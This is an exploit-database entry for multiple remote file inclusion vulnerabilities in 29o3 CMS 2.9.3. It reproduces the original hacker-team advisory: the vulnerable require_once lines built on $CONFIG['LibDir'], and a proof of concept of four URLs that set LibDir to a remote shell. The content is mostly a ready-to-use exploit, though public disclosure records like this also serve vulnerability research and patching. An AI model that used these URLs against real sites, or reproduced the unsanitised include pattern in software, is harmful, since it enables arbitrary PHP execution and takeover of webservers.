header-logo
Suggest Exploit
vendor:
29o3
by:
eidelweiss
7,5
CVSS
HIGH
Multiple RFI Vulnerability
98
CWE
Product Name: 29o3
Affected Version From: 2.9.3
Affected Version To: 2.9.3
Patch Exists: YES
Related CWE: CVE-2004-2245
CPE: o:29o3:29o3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2004

29o3 CMS (LibDir) Multiple RFI Vulnerability

29o3 CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Updates are available. Please see the references for more information.
Source

Exploit-DB raw data:

================================================
29o3 CMS (LibDir) Multiple RFI Vulnerability
================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download:	http://prdownload.berlios.de/twonineothree/29o3_snapshot_20041026.tar.bz2

Author:		eidelweiss
Contact:	eidelweiss[at]cyberservices.com
Thank`s:	r0073r & 0x1D (inj3ct0r) , JosS (Hack0wn), exploit-db team , [D]eal [C]yber
Greetz: 	all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

Description:

29o3 is a management system for websites of all kinds.
With 29o3 you are able to maintain websites with most complex layouts as fast as possible while concentrating on what to do, not how to do.

License:	BSD License
Version:	29o3 0.1 Codename Broend PREBETA

========================================================================

	-=[ VULN C0de ]=-

[-] path/lib/page/pageDescriptionObject.php


/* 

require_once($CONFIG['LibDir'] . 'db/' . $CONFIG['DatabaseType'] . '.php');

require_once($CONFIG['LibDir'] . 'xhtml/xhtmlheader.php');
require_once($CONFIG['LibDir'] . 'xhtml/xhtmlbody.php');

*/
 
========================================================================

[-] path/lib/layout/layoutHeaderFuncs.php


require_once($CONFIG['LibDir'] . 'common.php');
require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php');
require_once($CONFIG['LibDir'] . 'db/' . $CONFIG['DatabaseType'] . '.php');

========================================================================

[-] path/lib/layout/layoutManager.php

// include the layout parser/lexer
require_once($CONFIG['LibDir'] . 'layout/layoutParser.php');
require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php');

========================================================================

[-] path/lib/layout/layoutParser.php

require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php');
require_once($CONFIG['LibDir'] . 'layout/layoutHeaderFuncs.php');

========================================================================

	-=[ P0C ]=-

	http://127.0.0.1/path/lib/page/pageDescriptionObject.php?LibDir=[inj3ct0r sh3ll]
	http://127.0.0.1/path/lib/layout/layoutHeaderFuncs.php?LibDir=[inj3ct0r sh3ll]
	http://127.0.0.1/path/lib/layout/layoutManager.php?LibDir=[inj3ct0r sh3ll]
	http://127.0.0.1/path/lib/layout/layoutParser.php?LibDir=[inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=================================

Navigation

Suggest Exploit

Services By CQR